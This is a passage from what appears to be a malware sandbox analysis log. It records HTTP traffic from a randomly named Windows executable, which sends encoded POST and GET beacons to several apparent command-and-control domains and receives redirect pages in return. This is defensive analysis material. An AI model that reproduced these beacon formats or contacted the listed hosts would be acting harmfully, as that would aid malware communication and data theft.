                                                                                        Data Raw: 37 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 69 73 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 72 65 67 69 73 74 65 72 65 64 20 77 69 74 68 20 47 61 6e 64 69 2e 6e 65 74 2e 20 49 74 20 69 73 20 63 75 72 72 65 6e 74 6c 79 20 70 61 72 6b 65 64 20 62 79 20 74 68 65 20 6f 77 6e 65 72 2e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 61 73 74 6f 72 67 2d 67 72 6f 75 70 2e 69 6e 66 6f 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 [TRUNCATED]
                                                                                        Data Ascii: 79d<!DOCTYPE html><html class="no-js" lang=en> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width"> <meta name="description" content="This domain name has been registered with Gandi.net. It is currently parked by the owner."> <title>astorg-group.info</title> <link rel="stylesheet" type="text/css" href="main-78844350.css"> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon"/> <link rel="preload" as="font" href="fonts/Montserrat-Regular.woff2" type="font/woff2" crossorigin/> <link rel="preload" as="font" href="fonts/Montserrat-SemiBold.woff2" type="font/woff2" crossorigin/> </head> <body> <div class="ParkingPage_2023-root_2dpus "><main class="OldStatic_2023-root_1AGy1 Parking_2023-root_qhMQ2"><div><article class="Parking_2023-content_1rA87"><h1 class="OldStatic_2023-title_13ceK">This domain name has been registered with Gandi.net</h1><div class="OldStatic_2023-text_37nqO Parking_2023-text_1JZys"><p><a href="https: [TRUNCATED]
                                                                                        Nov 6, 2024 16:01:24.861321926 CET914INData Raw: 3d 61 73 74 6f 72 67 2d 67 72 6f 75 70 2e 69 6e 66 6f 22 3e 3c 73 74 72 6f 6e 67 3e 56 69 65 77 20 74 68 65 20 57 48 4f 49 53 20 72 65 73 75 6c 74 73 20 6f 66 20 61 73 74 6f 72 67 2d 67 72 6f 75 70 2e 69 6e 66 6f 3c 2f 73 74 72 6f 6e 67 3e 3c 2f
                                                                                        Data Ascii: =astorg-group.info"><strong>View the WHOIS results of astorg-group.info</strong></a> to get the domains public registration information.</p></div><div class="Parking_2023-positionbox_2OgLh"><div class="Parking_2023-outerbox_2j18t"><p class=


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        29192.168.2.8497373.33.130.190805188C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 6, 2024 16:01:30.023247957 CET627OUTPOST /0m8a/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 205
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Host: www.fiqsth.vip
                                                                                        Origin: http://www.fiqsth.vip
                                                                                        Referer: http://www.fiqsth.vip/0m8a/
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Data Raw: 41 36 30 64 3d 74 31 63 6e 54 5a 35 78 61 7a 34 5a 47 61 55 67 7a 4b 50 54 45 61 53 70 58 45 33 66 43 51 54 4a 78 68 62 67 31 46 6b 55 41 4c 4d 63 39 44 2f 34 4b 4b 74 7a 4c 76 71 6e 6d 35 5a 4e 55 50 35 38 61 6a 4e 4e 61 72 73 62 4b 36 51 42 2b 7a 6b 67 37 2f 31 70 76 34 7a 63 6b 2f 42 51 62 35 39 42 79 78 4e 50 79 37 51 63 66 33 70 76 4e 49 2f 54 5a 37 53 39 47 33 7a 51 47 49 54 45 33 4d 79 53 50 36 35 76 52 77 66 30 62 4b 38 62 35 56 66 48 2f 70 4a 2f 6c 74 61 49 6c 6f 4e 4b 58 5a 66 4e 59 77 68 59 73 34 35 32 34 56 34 47 33 4b 63 71 37 43 5a 58 42 49 46 39 77 6f 30 30 4b 6b 6e 6d 30 54 68 62 58 51 51 3d
                                                                                        Data Ascii: A60d=t1cnTZ5xaz4ZGaUgzKPTEaSpXE3fCQTJxhbg1FkUALMc9D/4KKtzLvqnm5ZNUP58ajNNarsbK6QB+zkg7/1pv4zck/BQb59ByxNPy7Qcf3pvNI/TZ7S9G3zQGITE3MySP65vRwf0bK8b5VfH/pJ/ltaIloNKXZfNYwhYs4524V4G3Kcq7CZXBIF9wo00Kknm0ThbXQQ=


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        30192.168.2.8497383.33.130.190805188C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 6, 2024 16:01:32.569741011 CET647OUTPOST /0m8a/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 225
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Host: www.fiqsth.vip
                                                                                        Origin: http://www.fiqsth.vip
                                                                                        Referer: http://www.fiqsth.vip/0m8a/
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Data Raw: 41 36 30 64 3d 74 31 63 6e 54 5a 35 78 61 7a 34 5a 48 36 45 67 2b 4a 6e 54 43 36 53 71 4a 30 33 66 4c 77 54 4e 78 68 58 67 31 45 67 45 41 5a 6f 63 2b 69 50 34 4a 4c 74 7a 4d 76 71 6e 2b 4a 5a 45 51 50 35 4e 61 6a 78 46 61 70 49 62 4b 36 45 42 2b 7a 30 67 34 49 68 71 75 6f 7a 61 76 66 42 6f 55 5a 39 42 79 78 4e 50 79 37 45 69 66 78 42 76 4e 38 37 54 66 76 47 2b 59 6e 7a 54 50 6f 54 45 7a 4d 79 57 50 36 35 42 52 30 2f 65 62 4d 34 62 35 55 76 48 2b 34 4a 2b 71 74 61 4f 34 34 4d 6c 45 4a 69 68 5a 53 64 76 6b 59 70 57 2b 48 73 69 37 63 74 41 68 67 52 52 43 49 74 57 77 72 63 43 50 54 36 4f 75 77 78 72 4a 48 48 7a 63 73 6a 6b 71 66 65 54 41 39 2f 4b 4c 6e 68 41 56 78 41 75
                                                                                        Data Ascii: A60d=t1cnTZ5xaz4ZH6Eg+JnTC6SqJ03fLwTNxhXg1EgEAZoc+iP4JLtzMvqn+JZEQP5NajxFapIbK6EB+z0g4IhquozavfBoUZ9ByxNPy7EifxBvN87TfvG+YnzTPoTEzMyWP65BR0/ebM4b5UvH+4J+qtaO44MlEJihZSdvkYpW+Hsi7ctAhgRRCItWwrcCPT6OuwxrJHHzcsjkqfeTA9/KLnhAVxAu


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        31192.168.2.8497393.33.130.190805188C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 6, 2024 16:01:35.112355947 CET1664OUTPOST /0m8a/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 1241
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Host: www.fiqsth.vip
                                                                                        Origin: http://www.fiqsth.vip
                                                                                        Referer: http://www.fiqsth.vip/0m8a/
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Data Raw: 41 36 30 64 3d 74 31 63 6e 54 5a 35 78 61 7a 34 5a 48 36 45 67 2b 4a 6e 54 43 36 53 71 4a 30 33 66 4c 77 54 4e 78 68 58 67 31 45 67 45 41 5a 67 63 2b 56 6e 34 54 6f 46 7a 4e 76 71 6e 67 35 5a 4a 51 50 35 51 61 6e 64 42 61 70 31 35 4b 34 38 42 34 56 34 67 35 38 4e 71 6b 6f 7a 61 67 2f 42 54 62 35 39 75 79 78 64 4c 79 37 55 69 66 78 42 76 4e 36 58 54 4a 4c 53 2b 61 6e 7a 51 47 49 54 51 33 4d 79 79 50 36 78 33 52 30 36 72 62 38 59 62 2b 30 2f 48 79 71 78 2b 6a 74 61 4d 37 34 4d 39 45 4a 75 2b 5a 53 42 6a 6b 62 31 77 2b 46 4d 69 2b 49 73 48 38 68 55 48 59 5a 4e 6e 39 61 34 59 58 68 43 63 6d 78 6c 2b 47 45 2f 70 66 73 6d 50 6e 66 48 48 43 64 47 48 63 52 56 76 53 31 70 59 55 47 64 4a 61 31 42 41 37 35 2b 69 6d 37 51 50 68 5a 41 4f 52 53 73 47 46 45 61 67 73 5a 51 44 31 6e 4c 46 6b 73 65 6d 41 48 5a 48 48 72 30 64 6e 36 43 46 75 41 57 62 42 4e 37 41 57 47 6a 65 6b 66 68 49 67 33 6c 72 50 4d 6c 70 51 65 31 6d 4b 6a 31 44 72 46 70 54 38 50 79 42 45 4b 7a 43 76 7a 68 38 79 46 6b 74 48 7a 61 64 53 4b 66 43 70 [TRUNCATED]
                                                                                        Data Ascii: A60d=t1cnTZ5xaz4ZH6Eg+JnTC6SqJ03fLwTNxhXg1EgEAZgc+Vn4ToFzNvqng5ZJQP5QandBap15K48B4V4g58Nqkozag/BTb59uyxdLy7UifxBvN6XTJLS+anzQGITQ3MyyP6x3R06rb8Yb+0/Hyqx+jtaM74M9EJu+ZSBjkb1w+FMi+IsH8hUHYZNn9a4YXhCcmxl+GE/pfsmPnfHHCdGHcRVvS1pYUGdJa1BA75+im7QPhZAORSsGFEagsZQD1nLFksemAHZHHr0dn6CFuAWbBN7AWGjekfhIg3lrPMlpQe1mKj1DrFpT8PyBEKzCvzh8yFktHzadSKfCpPKAvzOSA5U+QpPSx4Sc5Ds69m873XJtB5yxxBqTyEjHJpLPFC0ttmZIDYJmUrsYKuH6WjOSGt38BA1IUev1P4/TJAY8wW0mj9STECg1M5i6Z1Ol7UwciP4S9910tKkFIog7Crleqle25dhRXv/zoM8D5Gwk2mku/SDZuLmsZoXyHbkoe8mZdcLBtDjIVbm8rGU0iP9xcNMjA+IMM/Xs/YTo3fXU61ALD74WrG984YghOzmTo9D7PSYMe0E+pYSww0Vjgq9zai7iJbTO6zfCkCD8yzWGD8tYLHyi36p6IwFz8VrByEEDRrG8LY9i4TsE/iJc6vxXu2o7FroUjiynOA00a57k3PGAdRaxnDX8NnPbm6nO9OrhYbuRkn57SGwEZcoWw2Rc//M/2UjqQiA2TFb3C7kfdNT+V3EZrL2Tb8gb9nAlJSWaX1yYzVHEUp0RYLO490O+FguLvVu6yXOuS7cVWOcAvsnQkEc+ubrQBQzlNqyuap37oCRvjuf081szDYytg9+51Law6/9LCn43Lr9i5llDp6oNcColKFCTwYSqeHGq2wZQiLe3Kim3QHhUGEnIev5rDb6gOtDPjYIOslwHOXcUsr9bXEGCr7fPHu8AdF+xwCIbqE6l9gWd6OfMowUlmOnM4W5DPAy7jLsm72Mb8Vfsr+GnfF0 [TRUNCATED]


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        32192.168.2.8497403.33.130.190805188C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 6, 2024 16:01:37.665546894 CET376OUTGET /0m8a/?A60d=g30HQpd+HgMxFOsvy4fBD4ePDG+xSAfLohG12Vx+WMYj+wKARJtbcOCwopNwAttyOSN3X6k6S6oD2z0+/9dAp7faj8lfUqZu5U5j35YEbCksI5bqMK6zFCmtbYf508vfTQ==&QftlZ=CnaPg8j HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Connection: close
                                                                                        Host: www.fiqsth.vip
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Nov 6, 2024 16:01:38.300812960 CET406INHTTP/1.1 200 OK
                                                                                        Server: openresty
                                                                                        Date: Wed, 06 Nov 2024 15:01:38 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 266
                                                                                        Connection: close
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 41 36 30 64 3d 67 33 30 48 51 70 64 2b 48 67 4d 78 46 4f 73 76 79 34 66 42 44 34 65 50 44 47 2b 78 53 41 66 4c 6f 68 47 31 32 56 78 2b 57 4d 59 6a 2b 77 4b 41 52 4a 74 62 63 4f 43 77 6f 70 4e 77 41 74 74 79 4f 53 4e 33 58 36 6b 36 53 36 6f 44 32 7a 30 2b 2f 39 64 41 70 37 66 61 6a 38 6c 66 55 71 5a 75 35 55 35 6a 33 35 59 45 62 43 6b 73 49 35 62 71 4d 4b 36 7a 46 43 6d 74 62 59 66 35 30 38 76 66 54 51 3d 3d 26 51 66 74 6c 5a 3d 43 6e 61 50 67 38 6a 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?A60d=g30HQpd+HgMxFOsvy4fBD4ePDG+xSAfLohG12Vx+WMYj+wKARJtbcOCwopNwAttyOSN3X6k6S6oD2z0+/9dAp7faj8lfUqZu5U5j35YEbCksI5bqMK6zFCmtbYf508vfTQ==&QftlZ=CnaPg8j"}</script></head></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        33192.168.2.8497413.33.130.190805188C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 6, 2024 16:01:43.496015072 CET639OUTPOST /ezyn/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 205
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Host: www.bio-thymus.com
                                                                                        Origin: http://www.bio-thymus.com
                                                                                        Referer: http://www.bio-thymus.com/ezyn/
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Data Raw: 41 36 30 64 3d 45 6e 59 54 4c 73 4d 56 6e 41 46 4c 78 61 65 4b 4f 5a 38 33 64 57 31 66 7a 39 35 5a 71 63 54 35 4a 68 5a 50 51 74 6f 35 62 59 34 62 31 39 4c 69 62 5a 44 43 32 59 2b 30 58 54 65 49 41 2f 2f 4f 61 30 46 49 30 69 66 35 39 69 68 33 47 7a 39 54 4b 66 41 73 4e 76 34 56 42 32 41 76 38 4a 4d 79 58 64 43 42 77 38 70 51 65 7a 56 2b 49 33 6e 51 57 6f 4e 79 62 53 34 2b 56 54 59 6f 55 68 75 37 69 4c 42 38 72 55 63 63 6d 69 76 41 7a 63 75 77 63 35 4c 45 7a 53 33 4d 52 58 57 79 77 55 42 39 39 75 6a 44 35 59 66 6f 50 39 7a 2f 7a 4a 6b 58 68 55 6a 37 79 70 50 6d 41 6b 4c 56 73 41 63 53 56 2b 57 64 69 6e 67 3d
                                                                                        Data Ascii: A60d=EnYTLsMVnAFLxaeKOZ83dW1fz95ZqcT5JhZPQto5bY4b19LibZDC2Y+0XTeIA//Oa0FI0if59ih3Gz9TKfAsNv4VB2Av8JMyXdCBw8pQezV+I3nQWoNybS4+VTYoUhu7iLB8rUccmivAzcuwc5LEzS3MRXWywUB99ujD5YfoP9z/zJkXhUj7ypPmAkLVsAcSV+Wding=


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        34192.168.2.8497423.33.130.190805188C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 6, 2024 16:01:46.035428047 CET659OUTPOST /ezyn/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 225
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Host: www.bio-thymus.com
                                                                                        Origin: http://www.bio-thymus.com
                                                                                        Referer: http://www.bio-thymus.com/ezyn/
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Data Raw: 41 36 30 64 3d 45 6e 59 54 4c 73 4d 56 6e 41 46 4c 33 4b 75 4b 4a 2b 51 33 49 47 31 63 71 4e 35 5a 39 4d 54 39 4a 68 46 50 51 6f 51 50 62 72 63 62 79 63 37 69 61 63 76 43 31 59 2b 30 63 7a 65 4e 45 2f 2f 37 61 7a 4e 41 30 6a 6a 35 39 69 31 33 47 7a 74 54 4e 6f 63 6a 4e 2f 34 74 4a 57 41 58 79 70 4d 79 58 64 43 42 77 34 42 2b 65 31 39 2b 4c 47 58 51 57 4b 31 78 48 43 34 2f 42 44 59 6f 51 68 75 2f 69 4c 42 65 72 56 42 7a 6d 67 58 41 7a 5a 53 77 53 49 4c 48 36 53 32 4a 4a 33 58 77 31 78 63 46 37 75 7a 6d 34 5a 6a 32 41 65 48 34 32 2f 56 39 37 32 72 39 78 70 6e 4e 41 6e 6a 6a 70 33 42 36 50 64 47 74 38 77 30 76 70 50 4f 45 36 57 44 72 52 49 4e 54 72 2b 51 63 6b 43 5a 36
                                                                                        Data Ascii: A60d=EnYTLsMVnAFL3KuKJ+Q3IG1cqN5Z9MT9JhFPQoQPbrcbyc7iacvC1Y+0czeNE//7azNA0jj59i13GztTNocjN/4tJWAXypMyXdCBw4B+e19+LGXQWK1xHC4/BDYoQhu/iLBerVBzmgXAzZSwSILH6S2JJ3Xw1xcF7uzm4Zj2AeH42/V972r9xpnNAnjjp3B6PdGt8w0vpPOE6WDrRINTr+QckCZ6


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        35192.168.2.8497433.33.130.190805188C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 6, 2024 16:01:49.319799900 CET1676OUTPOST /ezyn/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 1241
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Host: www.bio-thymus.com
                                                                                        Origin: http://www.bio-thymus.com
                                                                                        Referer: http://www.bio-thymus.com/ezyn/
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Data Raw: 41 36 30 64 3d 45 6e 59 54 4c 73 4d 56 6e 41 46 4c 33 4b 75 4b 4a 2b 51 33 49 47 31 63 71 4e 35 5a 39 4d 54 39 4a 68 46 50 51 6f 51 50 62 72 55 62 79 75 7a 69 59 2f 58 43 30 59 2b 30 43 44 65 4d 45 2f 2f 63 61 79 70 45 30 6a 76 70 39 6e 78 33 48 56 68 54 49 64 6f 6a 47 2f 34 74 46 32 41 73 38 4a 4d 64 58 64 54 4b 77 38 6c 2b 65 31 39 2b 4c 45 50 51 66 34 4e 78 58 79 34 2b 56 54 59 6b 55 68 75 44 69 4c 59 70 72 56 46 5a 6e 55 72 41 30 39 4f 77 51 36 54 48 6d 43 32 4c 63 33 58 53 31 78 59 61 37 75 76 45 34 5a 48 51 41 65 2f 34 33 34 73 44 2b 45 2b 6a 6c 2b 66 49 62 45 75 46 77 6b 4e 4f 48 76 65 56 32 67 67 6f 6d 2f 43 79 30 52 75 6c 62 61 6c 63 2b 4c 59 38 31 31 6f 78 68 32 54 63 4e 2f 56 31 4a 49 4a 38 49 4d 79 45 68 6a 7a 36 75 68 72 68 31 36 6e 55 50 2b 68 38 75 45 38 2f 4e 69 53 32 64 59 30 35 52 44 51 57 58 56 69 4d 71 52 72 5a 77 36 64 45 30 6a 67 6b 46 56 48 78 4e 42 38 73 6f 52 4b 6f 57 58 73 58 35 6e 44 43 63 34 74 63 62 4b 6d 6a 34 77 52 7a 66 75 6c 4d 37 32 78 4f 59 70 76 71 57 78 37 79 69 [TRUNCATED]
                                                                                        Data Ascii: A60d=EnYTLsMVnAFL3KuKJ+Q3IG1cqN5Z9MT9JhFPQoQPbrUbyuziY/XC0Y+0CDeME//caypE0jvp9nx3HVhTIdojG/4tF2As8JMdXdTKw8l+e19+LEPQf4NxXy4+VTYkUhuDiLYprVFZnUrA09OwQ6THmC2Lc3XS1xYa7uvE4ZHQAe/434sD+E+jl+fIbEuFwkNOHveV2ggom/Cy0Rulbalc+LY811oxh2TcN/V1JIJ8IMyEhjz6uhrh16nUP+h8uE8/NiS2dY05RDQWXViMqRrZw6dE0jgkFVHxNB8soRKoWXsX5nDCc4tcbKmj4wRzfulM72xOYpvqWx7yiz/7beDIPtKH1rjXmZWF9zcpkmxl5sGZbRwv0bjyFkbMGnVxzyCq9qql60Qwh7W4rV5p5ngszZzBFXxz5DDVzl+dEnZ+tyn/ItG6CoNmmZsMYvYsFNerWFqC8oBeEN/ekwS/WBEv11bdMmUaQWZtrUmv1W964OygPy90quCoBVe6Ud6+nj6FduBlfvoYpMm4JppDBKT6draHzi91ReEPqmwKr1DPIwpAKFxUOeNOI8Cb/hCaE71StrHmJC3u8lsPLRMU+1HSmiyPDarOaH5heawqRXZ3hKHHgV8BNzglylrnN2LUc+ENRsXWIpcRTFscP4E+Ugenb/8ua+3roYYkWzJaUZEbQ5QzMo1ID9/UJ+PFUWGpxagx8/ZtHjZtcf1cozZZKL6hHhQkFqHLMf7NvS2pbPjAB2B9R506AxtF31n4ZBVgPATU5gl0kMW2o5fYcODuFuw1ZCpEK16TQwA5HPtpmIKiLP9UtPdIgYd+/cAl8l4ns9jPqjVwEHgc8+4mHdip0bSJiUCjV1KG7Vy4qVuOl9BZL57M+nczf0HShDJl1mMBTs8DukMeHoNvUsYIU84Iw4Gs+etHxxvYItA+IzLW/L51E2LoSRRD7H5zS4OP6c6mTwn4K2ceT2S7v8xyt+SLP5MXWOtbu0w1e4WrS0QIEQ7M+Or88uh [TRUNCATED]


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        36192.168.2.8497443.33.130.190805188C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 6, 2024 16:01:51.922350883 CET380OUTGET /ezyn/?A60d=JlwzIZwI1xJFqouTAqQiGi5FnZJep/DAQQtIf/F0T8wp//PaftbgsqCDWgKyQb/wN3l14QHm5S9DGTsxEdEMLO8/BWEb4M0fVL3Jy75+c2YHHmj0ZqdnbhQxCwgxfTHy3A==&QftlZ=CnaPg8j HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Connection: close
                                                                                        Host: www.bio-thymus.com
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Nov 6, 2024 16:01:52.473377943 CET406INHTTP/1.1 200 OK
                                                                                        Server: openresty
                                                                                        Date: Wed, 06 Nov 2024 15:01:52 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 266
                                                                                        Connection: close
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 41 36 30 64 3d 4a 6c 77 7a 49 5a 77 49 31 78 4a 46 71 6f 75 54 41 71 51 69 47 69 35 46 6e 5a 4a 65 70 2f 44 41 51 51 74 49 66 2f 46 30 54 38 77 70 2f 2f 50 61 66 74 62 67 73 71 43 44 57 67 4b 79 51 62 2f 77 4e 33 6c 31 34 51 48 6d 35 53 39 44 47 54 73 78 45 64 45 4d 4c 4f 38 2f 42 57 45 62 34 4d 30 66 56 4c 33 4a 79 37 35 2b 63 32 59 48 48 6d 6a 30 5a 71 64 6e 62 68 51 78 43 77 67 78 66 54 48 79 33 41 3d 3d 26 51 66 74 6c 5a 3d 43 6e 61 50 67 38 6a 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?A60d=JlwzIZwI1xJFqouTAqQiGi5FnZJep/DAQQtIf/F0T8wp//PaftbgsqCDWgKyQb/wN3l14QHm5S9DGTsxEdEMLO8/BWEb4M0fVL3Jy75+c2YHHmj0ZqdnbhQxCwgxfTHy3A==&QftlZ=CnaPg8j"}</script></head></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        37192.168.2.84974547.52.221.8805188C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 6, 2024 16:01:58.266865969 CET639OUTPOST /9ezc/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 205
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Host: www.wukong.college
                                                                                        Origin: http://www.wukong.college
                                                                                        Referer: http://www.wukong.college/9ezc/
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
